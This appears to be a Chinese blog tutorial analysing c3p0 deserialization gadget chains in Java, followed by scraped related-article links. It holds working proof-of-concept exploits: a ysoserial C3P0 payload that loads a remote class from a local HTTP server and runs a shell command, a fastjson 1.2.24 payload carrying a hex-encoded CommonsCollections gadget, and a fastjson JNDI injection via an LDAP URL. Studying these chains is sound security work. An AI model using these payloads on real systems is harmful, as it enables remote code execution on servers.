C3P0

c3p0第一次听闻是用于fastjson的回显上,大佬们总结三种方法,后面两种主要就是用于fastjson和jackjson的回显利用(注入内存马)

http base

jndi

hex序列化字节加载器

1、http base

1.1、漏洞复现

package ysoserial.test;

import ysoserial.Serializer;

import ysoserial.payloads.C3P0;

import java.io.*;

public class C3P0Test {

    public static void main(String[] args) throws Exception {

        C3P0 c3P0 = new C3P0();

        Object object = c3P0.getObject("http://127.0.0.1:8000/:EXP");

        serialize(object,"c3p0.ser");

        unserialize("c3p0.ser");

    }

    public static void serialize(Object obj ,String path) throws Exception{

        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(path));

        objectOutputStream.writeObject(obj);

    }

    public static void unserialize(String path) throws Exception{

        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(path));

        objectInputStream.readObject();

    }

}

exp



public class EXP {

    public EXP() {

    }

    static {

        try {

            Runtime var0 = Runtime.getRuntime();

            String[] var1 = new String[]{"bash", "-c", "open -a calculator.app"};

            Process var2 = var0.exec(var1);

            var2.waitFor();

        } catch (Exception var3) {

        }

    }

}

1.2、漏洞分析

我跟jdk7u21一样还是通过ysoserial来学习,首先先学习一下c3p0链,我们看到getObject()方法,他就是通过:截断,获取url和类名,然后反射创建PoolBackedDataSource类,设置其connectionPoolDataSource属性设置为new PoolSource(className, url)实例。

我们继续看看PoolSource,除了构造方法赋值外就是有一个getReference()方法,传入了我们的恶意的url和className

public class C3P0 implements ObjectPayload<Object> {

    public Object getObject ( String command ) throws Exception {

        int sep = command.lastIndexOf(':');

        if ( sep < 0 ) {

            throw new IllegalArgumentException("Command format is: <base_url>:<classname>");

        }

        String url = command.substring(0, sep);

        String className = command.substring(sep + 1);

        PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);

        Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource(className, url));

        return b;

    }

    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {

        private String className;

        private String url;

        public PoolSource ( String className, String url ) {

            this.className = className;

            this.url = url;

        }

        public Reference getReference () throws NamingException {

            return new Reference("exploit", this.className, this.url);

        }

        public PrintWriter getLogWriter () throws SQLException {return null;}

        public void setLogWriter ( PrintWriter out ) throws SQLException {}

        public void setLoginTimeout ( int seconds ) throws SQLException {}

        public int getLoginTimeout () throws SQLException {return 0;}

        public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}

        public PooledConnection getPooledConnection () throws SQLException {return null;}

        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}

    }

    public static void main ( final String[] args ) throws Exception {

        PayloadRunner.run(C3P0.class, args);

    }

}

1.3、POC调试

1.3.1、序列化分析

我先来看看是怎么序列化的过程,在writeObject处打下断点

跟进去,进入到com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase,回去序列化我们的输入this.connectionPoolDataSource,但是由于我们输入的其实就是PoolSource,无法序列化,继续往下走

走到这,他会序列化indirector.indirectForm(this.connectionPoolDataSource),我们

indirector = new ReferenceIndirector();

oos.writeObject(indirector.indirectForm(this.connectionPoolDataSource));

我们跟进去看看,此处调用的getReference()就是PoolSource的getReference方法,也是为什么PoolSource要重写该方法

然后就是ReferenceIndirector.ReferenceSerialized(),我们继续跟进去,可以看到就是把我们构造的特殊的reference赋值给this.reference,所以序列化文件里是包含这我们的恶意reference。

1.3.2、反序列化分析

我们从报错的也可以看出序列化的接口是在com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase的readObject

利用链

/*

 * Gadget:

 *   PoolBackedDataSourceBase#readObject

 *     ReferenceIndirector$ReferenceSerialized#getObject

 *       ReferenceableUtils#referenceToObject

 *         Class#forName

 * */

我们把断点打在PoolBackedDataSourceBase的readObect(),走到这,会判断o是不是IndirectlySerialized,那么就会触发ReferenceIndirector的getObject方法,跟进去

进来后会通过ReferenceableUtils.referenceToObject()方法将this.reference(恶意链接)转换成Object,我们继续跟进去

获取我们恶意地址字符串和恶意类字符串分别存入var4和var11,并且新建一个ClassLoder里面存我地址,然后通过Class.forName方法加载,此时的var4和var7都是我们可以控制的。然后就会去寻找对应的地址请求恶意类。

我们可以看到在Class.forName触发了我们的代码执行,原因是Class.forName如果没有给定 classloader, 那么会使用根类加载器。如果initalize这个参数传了 true,那么给定的类如果之前没有被初始化过,那么会被初始化,造成远程代码执行

2、hex序列化字节加载器

这个可以满足fastjson和c3p0可以做到不出网利用。首先生成序列化payload,这里的payload注意是需要本地的另一条Gadget比如CC或者CB链,然后hex编码一下拼到PoC里

java -jar ysoserial.jar CommonsCollections2 "open -a Calculator" > calc.ser

2.1、poc复现

依赖

        <dependency>

            <groupId>com.alibaba</groupId>

            <artifactId>fastjson</artifactId>

            <version>1.2.24</version>

        </dependency>

        <dependency>

            <groupId>com.mchange</groupId>

            <artifactId>c3p0</artifactId>

            <version>0.9.5.2</version>

        </dependency>

        <!-- https://mvnrepository.com/artifact/org.apache.commons/commons-collections4 -->

        <dependency>

            <groupId>org.apache.commons</groupId>

            <artifactId>commons-collections4</artifactId>

            <version>4.0</version>

        </dependency>

Poc

{"e":{"@type":"java.lang.Class","val":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"},"f":{"@type":"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource","userOverridesAsString":"HexAsciiSerializedMap:hex编码内容;"}}


package com.akkacloud;

import com.alibaba.fastjson.JSON;

import com.mchange.lang.ByteUtils;

import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;

import java.io.*;

import java.util.Arrays;

public class fast {

    public static void main(String[] args) throws IOException, ClassNotFoundException {

        InputStream in = new FileInputStream("/Users/akka/Desktop/tools/EXP/Weblogic/calc.ser");

        byte[] data = toByteArray(in);

        in.close();

        String HexString = bytesToHexString(data, data.length);

        System.out.println(HexString);

        String poc ="{\"e\":{\"@type\":\"java.lang.Class\",\"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"},\"f\":{\"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\"userOverridesAsString\":\"HexAsciiSerializedMap:"+HexString+";\"}}";

        JSON.parseObject(poc);

    }

    public static byte[] toByteArray(InputStream in) throws IOException {

        byte[] classBytes;

        classBytes = new byte[in.available()];

        in.read(classBytes);

        in.close();

        return classBytes;

    }

    public static String bytesToHexString(byte[] bArray, int length) {

        StringBuffer sb = new StringBuffer(length);

        for(int i = 0; i < length; ++i) {

            String sTemp = Integer.toHexString(255 & bArray[i]);

            if (sTemp.length() < 2) {

                sb.append(0);

            }

            sb.append(sTemp.toUpperCase());

        }

        return sb.toString();

    }

}

2.2、poc分析

原因仍然是fastjson自动调用属性的setter和getter方法。不懂得可以学习一下前面

我们直接在com.mchange.v2.c3p0.WrapperConnectionPoolDataSource类的 setUpPropertyListeners处打下断点,调用了parseUserOverridesAsString((String)val) ,val就是我们传入的hex加密的字符串,跟进去

该方法就是把传入的hex加密字符串解密成byte[],然后调用fromByteArray方法,继续跟进去

然后调用deserializeFromByteArray方法,继续跟进

到这一步就很清晰了,调用readObejct,造成反序列化恶意代码执行

3、JNDI利用

此方法可以配合tomcatEcho,达到回显

3.1、POC复现

依赖

<dependency>

  <groupId>com.alibaba</groupId>

  <artifactId>fastjson</artifactId>

  <version>1.2.24</version>

  </dependency>

  <!-- https://mvnrepository.com/artifact/org.apache.tomcat/tomcat-dbcp -->

<dependency>

  <groupId>com.mchange</groupId>

  <artifactId>c3p0</artifactId>

  <version>0.9.5.2</version>

  </dependency>


package com.akkacloud;

import com.alibaba.fastjson.JSON;

public class fast {

    public static void main(String[] args) throws Exception {

        String poc = "{\"@type\":\"com.mchange.v2.c3p0.JndiRefForwardingDataSource\",\"jndiName\":\"ldap://127.0.0.1:1389/EXP\", \"loginTimeout\":0}";

        JSON.parseObject(poc);

    }

}

3.2、POC分析

这跟fastjson其他利用链的差不多都是由于fastjson会自动触发字段的setter和getter方法。所以会自动触发com.mchange.v2.c3p0.JndiRefForwardingDataSourcesetJndiName,但是由于该类没有该方法就会调用其父类com.mchange.v2.c3p0.impl.JndiRefDataSourceBasesetJndiName。我们在该方法打下断点,可以看到该方法就是把this.jndiName赋值为其传入的值(恶意链接),然后就是调用setloginTimeout

然后进入到om.mchange.v2.c3p0.JndiRefForwardingDataSource累的setloginTimeout,调用inner方法,跟进去

继续调用dereference方法,继续跟进

跟进去就发现会调用我们ctx.lookup((String)jndiName),完成jndi注入

参考

https://www.cnblogs.com/nice0e3/p/15058285.html

https://www.shuzhiduo.com/A/ZOJPN24Odv/

C3P0反序列化链学习的更多相关文章

  1. CommonsCollection6反序列化链学习

    CommonsCollection6 1.前置知识 1.1.HashSet HashSet 基于 HashMap 来实现的,是一个不允许有重复元素的集合.继承了序列化和集合 构造函数参数为空的话创建一 ...

  2. CommonsCollection4反序列化链学习

    CommonsCollection4 1.前置知识 由于cc4没有新的知识点,主要是用cc2,然后稍微cc3结合了,所以我们可以看ysoserial源码,自己尝试构造一下,把cc2通过获取Invoke ...

  3. CommonsCollection7反序列化链学习

    CommonsCollections7 1.前置知识 Hashtable Hashtable实现了Map接口和Serializable接口,因此,Hashtable现在集成到了集合框架中.它和Hash ...

  4. URLDNS反序列化链学习

    URLDNS URLDNS跟CommonsCollections比起来真是眉清目秀,该链主要用于验证漏洞,并不能执行命令,优点就是不依赖任何包. 1.利用链 * Gadget Chain: * Has ...

  5. GNU工具链学习笔记

    GNU工具链学习笔记 1..so为动态链接库,.a为静态连接库.他们在Linux下按照ELF格式存储.ELF有四种文件类型.可重定位文件(Relocatable file,*.o,*.a),包含代码和 ...

  6. 安洵杯iamthinking(tp6反序列化链)

    安洵杯iamthinking tp6pop链 考点: 1.tp6.0反序列化链 2.parse_url()绕过 利用链: 前半部分利用链(tp6.0) think\Model --> __des ...

  7. Fastjsonfan反序列链学习前置知识

    Fastjson前置知识 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象. Fastjson 可以操作任何 ...

  8. Fastjson JdbcRowSetImpl利用链学习

    JdbcRowSetImpl 接着继续学习fastjson的第二条链JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,而且其原理就是setter的自动调用,具体se ...

  9. JS 原型链学习总结

    废话篇: 在js的学习过程中有一大难点就是原型链.学习的时候一直对这一内容不是十分的明白.纠结的我简直难受.,幸好总算给他弄通了,哇咔咔,总算可以不用在睡梦中还想着他了. 正文篇: 要了解原型链我们首 ...

随机推荐

  1. iscsi挂载

                                                                         iscsi挂载 1.server端:   (1) yum -y ...

  2. 学习SpringMVC必知必会(7)~springmvc的数据校验、表单标签、文件上传和下载

    输入校验是 Web 开发任务之一,在 SpringMVC 中有两种方式可以实现,分别是使用 Spring 自带的验证 框架和使用 JSR 303 实现, 也称之为 spring-validator 和 ...

  3. k8s集群搭建过程详解

    准备工作 安装CentOS7虚拟机 略 安装Docker 略 关闭CentOS7自带的防火墙服务 systemctl disable firewalld systemctl stop firewall ...

  4. 文件下载文件名包含中文时,乱码的处理方法(url编解码)

    utf-8/gbk编码 "中"这个汉子的utf-8编码为:E4B8AD gbk编码为:D6D0 urlencode 经过urlencode编码后, %E4%B8%AD %D6%D0 ...

  5. springboot使用@Value注入properties文件中的值,中文乱码

    最近开发一个需求,讲一个中文值配置在properties文件中,然后代码中使用@Value注解进行注入使用,然而出现了如下状况: 中文出现乱码,将代码修改如下: String str = new St ...

  6. SPI简单解析

    什么是SPI  一种服务加载方式,全名为Service Provider Interface,Service提供者接口 如果我们要抽象里面的模块,在面对对象编程当中,我们模块之间,一般推荐模块之间基于 ...

  7. 如何在网上找java包

    如图所示 在java api后面输入你要找包的名称就可以了

  8. Redis 常见性能问题和解决方案?

    1.Master 最好不要写内存快照,如果 Master 写内存快照,save 命令调度 rdbSave 函数,会阻塞主线程的工作,当快照比较大时对性能影响是非常大的,会间断性 暂停服务 2.如果数据 ...

  9. poi整合springboot超简单入门例子

    1.导入依赖 2.application.properties只需要数据库连接信息就可以 3.目录结构 有个没用的service,请忽略 4.Controller,因为入门列子,所以简单的导出 导入读 ...

  10. pygame.error: video system not initialized

    在pygame写游戏出现pygame.error: video system not initialized 源代码 import sysimport pygamedef run_game(): py ...